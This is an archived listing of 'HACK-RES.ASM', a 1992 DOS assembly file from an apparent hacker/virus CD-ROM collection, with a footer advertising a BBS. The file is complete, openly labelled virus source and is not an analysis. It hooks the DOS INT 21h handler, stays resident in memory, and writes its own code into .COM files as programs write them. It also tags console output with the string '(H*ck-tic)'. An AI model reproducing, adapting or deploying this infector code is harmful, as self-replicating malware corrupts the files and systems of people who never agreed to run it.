home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / SOURCE.ZIP / HACK-RES.ASM < prev    next >
Assembly Source File  |  1992-11-07  |  3KB  |  84 lines
  1. tic             segment
  2.                 org     100h
  3.                 assume  cs:tic, ds:tic, es:tic
  4. ;
  5. len     equ     offset int21-100h      ;LENGTH OF VIRUS CODE
  6. ;
  7. start:          mov     ax,9000h       ;MOVE VIRUS CODE UP
  8.                 mov     es,ax
  9.                 mov     di,si
  10.                 mov     cx,len
  11.                 rep     movsb
  12.                 mov     ds,cx           ;DS = 0
  13.                 mov     si,84h          ;INT 21 VECTOR
  14.                 mov     di,offset int21
  15.                 push    di
  16.                 mov     dx,offset infect
  17.                 lodsw                   ;SAVE ORIGINAL VECTOR
  18.                 cmp     ax,dx           ;VIRUS PROBABLY ALREADY RESIDENT
  19.                 je      exit
  20.                 stosw
  21.                 lodsw
  22.                 stosw
  23.                 push    es
  24.                 pop     ds
  25.                 mov     ax,2521h        ;REVECTOR TO VIRUS
  26.                 int     21h
  27. exit:           push    cs              ;RESTORE SEGMENT REGISTERS
  28.                 pop     ds
  29.                 push    cs
  30.                 pop     es
  31.                 pop     si              ;SI = END OF VIRUS CODE
  32.                 mov     di,0fch
  33.                 push    di              ;RETURN HERE
  34.                 mov     ax,0aaach       ;LODSB/STOSB INSTRUCTIONS
  35.                 stosw
  36.                 mov     ax,0fce2h       ;LOOP TO ADDRESS INSTRUCTIONS
  37.                 stosw
  38.                 mov     ch,0feh
  39.                 ret                     ;MOVE CODE AND RUN PROGRAM
  40. ;
  41. infect:         pushf
  42.                 push    ax
  43.                 push    cx
  44.                 push    dx
  45.                 push    si
  46.                 push    ds
  47.                 cmp     ah,40h          ;WRITE FUNC?
  48.                 jne     done
  49.                 cmp     bx,1
  50.                 je      mes
  51.                 mov     si,dx           ;DS:DX = WRITE BUFFER
  52.                 lodsb
  53.                 cmp     al,0b8h         ;ALREADY INFECTED?
  54.                 je      done
  55.                 cmp     al,0ebh         ;PROBABLY .COM
  56.                 jne     done
  57.                 mov     cx,len          ;LENGTH OF VIRUS
  58.                 mov     dh,1            ;DX ASSUMED TO BE 0
  59. hack:           push    cs
  60.                 pop     ds
  61.                 pushf
  62.                 call    cs:[int21]      ;WRITE VIRUS
  63. done:           pop     ds
  64.                 pop     si
  65.                 pop     dx
  66.                 pop     cx
  67.                 pop     ax
  68.                 popf                    ;CONTINUE INTERRUPT
  69.                 jmp     cs:[int21]
  70. mes:            mov     cx,12
  71.                 mov     dx,offset string
  72.                 jmp     short hack
  73. string  db      ' (H*ck-tic) '
  74. ;
  75. int21   dd      0c3h                    ;STANDALONE VIRUS RETURNS
  76. tic             ends
  77.                 end     start
  78. 
  79. ; ─────────────────────────────────────────────────────────────────────────
  80. ; ────────────────────> and Remember Don't Forget to Call <────────────────
  81. ; ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
  82. ; ─────────────────────────────────────────────────────────────────────────
  83.  
  84.